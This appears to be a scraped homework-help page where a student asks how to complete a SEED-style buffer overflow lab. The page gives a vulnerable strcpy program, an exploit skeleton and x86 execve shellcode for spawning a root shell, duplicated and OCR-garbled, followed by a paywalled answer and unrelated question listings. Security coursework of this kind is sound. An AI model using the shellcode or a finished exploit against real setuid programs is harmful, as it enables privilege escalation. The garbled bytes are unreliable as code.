Question: Given the three C files, how to edit exploit.c so when you runt it , you get the root shell, this is a buffer overflow

Given the three C files, how to edit exploit.c so when yourunt it , you get the root shell, this is a bufferoverflow program. The last image is the desired result. * stack.c */Given the three C files, how to edit exploit.c so when you runt it , you get the root shell, this is a buffer overflow program.

/* Lab Exercise - Buffer Overflow */ /* This program has anThe last image is the desired result.

* stack.c */ /* Lab Exercise - Buffer Overflow */ /* This program has an buffer overflow vulnerability. */ /* Your task is to exploit this vulnerability */ #include #include #include int bof(char *str) { char buffer [422]; /* originally 12 in SEED labs */ //B0 Vulnerability strcpy(buffer,str); return 1; } int main(int argc, char* argv[]) { char str[1000); /* originally 517 in SEED labs */ FILE *badfile; badfile = fopen("badfile","r"); fread(str, sizeof(char), 1000, badfile); /* originally 517 in SEED labs */ bof(str); printf("Returned Properly "); return 1; } /* exploit.c */ /* A program that creates a file containing code for launching shell*/ #include #include #include */ char shellcode [ ]= "\x31\xCO" "\x50" "\x68""//sh" "\x68""/bin" "\x89\xe3" "\x50" "\x53" "\x89\xe1" "\x99" "\xb0\x0b" "\xcd\x80" ; /* xorl /* push? /* push? /* push? /* movl /* pushi /* push? /* movl /* cdal /* movb /* int %eax,%eax %eax $0x68732f2f $0x6e69622f %esp,%ebx %eax %ebx %esp,%ecx */ */ */ */ $0x0b,%al $0x80 */ unsigned long get_sp(void) { ("movl %esp,%eax"); } asm void main(int argc, char **arg) { char buffer[1000); /* originally 517 in SEED labs */ FILE *badfile; ------Initialize buffer with 0x90 (NOP instruction)--------*/ memset(buffer, 0x90, sizeof(buffer)); /*Add your changes to the buffer here */ /* Save the contents to the file "badfile" */ badfile = fopen("./badfile", "w"); fwrite(buffer, 1000,1,badfile); /* originally 517 in SEED labs */ fclose(badfile); } /* call_shellcode.c */ /*A program that creates a file containing code for launching shell*/ #include #include #include const char code[] = "\x31\xco" 1* xorl %eax,%eax */ "\x50" /* push? %eax "\x68""//sh" /* pushi $0x68732f2f "\x68""/bin" /* pushi $0x6e69622f "\x89\xe3" /* movl %esp,%ebx "\x50" /* pushi %eax */ "\x53" /* pushi %ebx "\x89\xe1" /* movl %esp,%ecx "\x99" /* cda "\xbo\xob" /* movb $oxob,%al "\xcd\x80" /* int $0x80 TI int main(int argc, char **argv) { char buf[sizeof(code)]; strcpy(buf, code); ((void(*)())buf)(); } $ gcc-o exploit exploit.c $./exploit // create the badfile $./stack // launch the attack by running the vulnerable # #include #include int bof(char *str) { char buffer [422]; /* originally 12 in SEED labs */ //B0 Vulnerability strcpy(buffer,str); return 1; } int main(int argc, char* argv[]) { char str[1000); /* originally 517 in SEED labs */ FILE *badfile; badfile = fopen("badfile","r"); fread(str, sizeof(char), 1000, badfile); /* originally 517 in SEED labs */ bof(str); printf("Returned Properly "); return 1; } /* exploit.c */ /* A program that creates a file containing code for launching shell*/ #include #include #include */ char shellcode [ ]= "\x31\xCO" "\x50" "\x68""//sh" "\x68""/bin" "\x89\xe3" "\x50" "\x53" "\x89\xe1" "\x99" "\xb0\x0b" "\xcd\x80" ; /* xorl /* push? /* push? /* push? /* movl /* pushi /* push? /* movl /* cdal /* movb /* int %eax,%eax %eax $0x68732f2f $0x6e69622f %esp,%ebx %eax %ebx %esp,%ecx */ */ */ */ $0x0b,%al $0x80 */ unsigned long get_sp(void) { ("movl %esp,%eax"); } asm void main(int argc, char **arg) { char buffer[1000); /* originally 517 in SEED labs */ FILE *badfile; ------Initialize buffer with 0x90 (NOP instruction)--------*/ memset(buffer, 0x90, sizeof(buffer)); /*Add your changes to the buffer here */ /* Save the contents to the file "badfile" */ badfile = fopen("./badfile", "w"); fwrite(buffer, 1000,1,badfile); /* originally 517 in SEED labs */ fclose(badfile); } /* call_shellcode.c */ /*A program that creates a file containing code for launching shell*/ #include #include #include const char code[] = "\x31\xco" 1* xorl %eax,%eax */ "\x50" /* push? %eax "\x68""//sh" /* pushi $0x68732f2f "\x68""/bin" /* pushi $0x6e69622f "\x89\xe3" /* movl %esp,%ebx "\x50" /* pushi %eax */ "\x53" /* pushi %ebx "\x89\xe1" /* movl %esp,%ecx "\x99" /* cda "\xbo\xob" /* movb $oxob,%al "\xcd\x80" /* int $0x80 TI int main(int argc, char **argv) { char buf[sizeof(code)]; strcpy(buf, code); ((void(*)())buf)(); } $ gcc-o exploit exploit.c $./exploit // create the badfile $./stack // launch the attack by running the vulnerable #

Step by Step Solution

There are 3 Steps involved in it

1 Expert Approved Answer
Step: 1 Unlock blur-text-image
Question Has Been Solved by an Expert!

Get step-by-step solutions from verified subject matter experts

Step: 2 Unlock
Step: 3 Unlock

Students Have Also Explored These Related Databases Questions!

Q:

computer security course, please I need help it due 3 hours. 1 Lab Overview The learning objective of this lab is for students to gain the first-hand experience on buffer-overflow vulner- ability by...

Q:

A Slower File System This project must be implemented in C Objectives There are two objectives to this assignment: To understand how file systems work, specifically the directory hierarchy and...

Q:

Objectives There are two objectives to this assignment: To understand how file systems work, specifically the directory hierarchy and storage management. To understand some of the performance issues...

Q:

Please help Below is the code used // Please change the following comment part into you name // #0#BEGIN# DO NOT MODIFIE THIS COMMENT LINE! // Chengfei // Wang // #0#END# DO NOT MODIFIE THIS COMMENT...

Q:

ICTN4310 LAB 03 - DATA ACQUISITION Background. Whether you are formatting an internal drive, external drive, USB flash drive, or SD card, Windows gives you the choice of using three different file...

Q:

1. When you pass an array as an argument to a function, what is actually passed? a. the address of the array b. the values of the elements in the array c. a duplicate of the array d. the number of...

Q:

Ques write a program in the language c which meets all the requirements below. 1. Function definitions, declarations and header files Guide C is a structured, procedural programming language, that...

Q:

Codes you need /* * bytedump.c * * This program reads a set number of bytes from a file and prints * out the hex/ASCII values one byte at a time. * * Compile: gcc bytedump.c -o bytedump */ #include...

Q:

/* bsdump.c * * Reads the boot sector of an MSDOS floppy disk */ #include #include #include #include #define SIZE 32 /* size of the read buffer */ //define PRINT_HEX // un-comment this to print the...

Q:

please help I need this by tonight ASAP. if you solve this i will give you the BEST RATING. ALL I NEED IS THE FULL DETAILED CODE FOR THE MULTITASKING COMMANDER. other commanders are finished. I...

Q:

What competitive advantages does the Hong Kong Jockey Club already have in their competition with online betting Web sites?

Q:

For each of the following, journalize the relevant closing entry. Make sure you include what account is debited and what account is credit. a-Turnkey Technology Co. has $50,000 of revenue generated...

Q:

Pick any firm and discuss how you would use a financial strategy to increase value in the context of one of the five Porter forces

Q:

Birthdaybook requires $125,000 to complete a project. a. With a compensating balance requirement of 10%, how much will the firm need to borrow? (Round the final answer to 2 decimal places.) Amount to...

Q:

2. What do you think is the most important organizational characteristic that influences training? Why?

Q:

1. How would you expect the training activities of a company that is dominant in its product market to differ from those of a company that emphasizes research and development?

Q:

6. Discuss the advantages and disadvantages of organizing the training function according to the faculty, customer, matrix, corporate university, and business-embedded models.